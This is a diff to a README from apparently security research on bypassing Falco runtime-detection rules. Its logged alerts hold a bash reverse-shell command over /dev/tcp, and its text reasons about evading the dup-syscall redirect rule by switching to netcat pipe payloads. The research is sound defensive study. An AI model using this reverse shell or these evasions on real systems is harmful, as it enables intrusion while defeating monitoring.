blackberry/Falco-bypasses/README.md

 14:44:37.439154946: Warning Redirect stdout/stdin to network connection (user=root user_loginuid=-1 k8s.ns=<NA> k8s.pod=<NA> container=3a03766368a0 process=gbash parent=gbash cmdline=gbash -c /tmp/gbash -i >& /dev/tcp/172.17.0.1/443 0>&1 terminal=34816 container_id=3a03766368a0 image=debian fd.name=172.17.0.2:48048->172.17.0.1:443 fd.num=1 fd.type=ipv4 fd.sip=172.17.0.1) k8s.ns=<NA> k8s.pod=<NA> container=3a03766368a0
 14:44:37.439157224: Warning Redirect stdout/stdin to network connection (user=root user_loginuid=-1 k8s.ns=<NA> k8s.pod=<NA> container=3a03766368a0 process=gbash parent=gbash cmdline=gbash -c /tmp/gbash -i >& /dev/tcp/172.17.0.1/443 0>&1 terminal=34816 container_id=3a03766368a0 image=debian fd.name=172.17.0.2:48048->172.17.0.1:443 fd.num=1 fd.type=ipv4 fd.sip=172.17.0.1) k8s.ns=<NA> k8s.pod=<NA> container=3a03766368a0
 ```
-Still, we still have to deal two(?) spurious events.
+Still, we have to deal two(?) spurious events.
 Taking a closer look at rule **Redirect STDOUT/STDIN to Network Connection in Container**, we don't see dependencies on _proc.name_ or _fd.name_ and no easy bypass apparent.
-The rule intercepts dup syscall that duplicates a file descriptor, in this case any of the stdin / stdout / stderr triade.
-The first thought is swapping dup call with one of the syster calls - dup2 or dup3 - that appear to have very similar functionality according to Linux man pages[^1].
+The rule intercepts dup syscall that duplicates a file descriptor, in this case any of the stdin / stdout / stderr triad.
+The first thought is swapping dup call with one of the sister calls - dup2 or dup3 - that appear to have very similar functionality according to Linux man pages[^1].
 However, that would mean duplicating bash functionality or somehow recompiling it with a different syscall.

 Instead, we can abandon dup altogether and find a new way to initiate a reverse shell.
 What about payloads that redirect shell to netcat through pipe creation?
-For the first time we will use sshayb/fuber:latest - an ubuntu-based [image](Dockerfile) that was specifically built to contain necessary tools and utilities for this study[^2]:
 ```
 [Container]
 docker run --rm -it sshayb/fuber:latest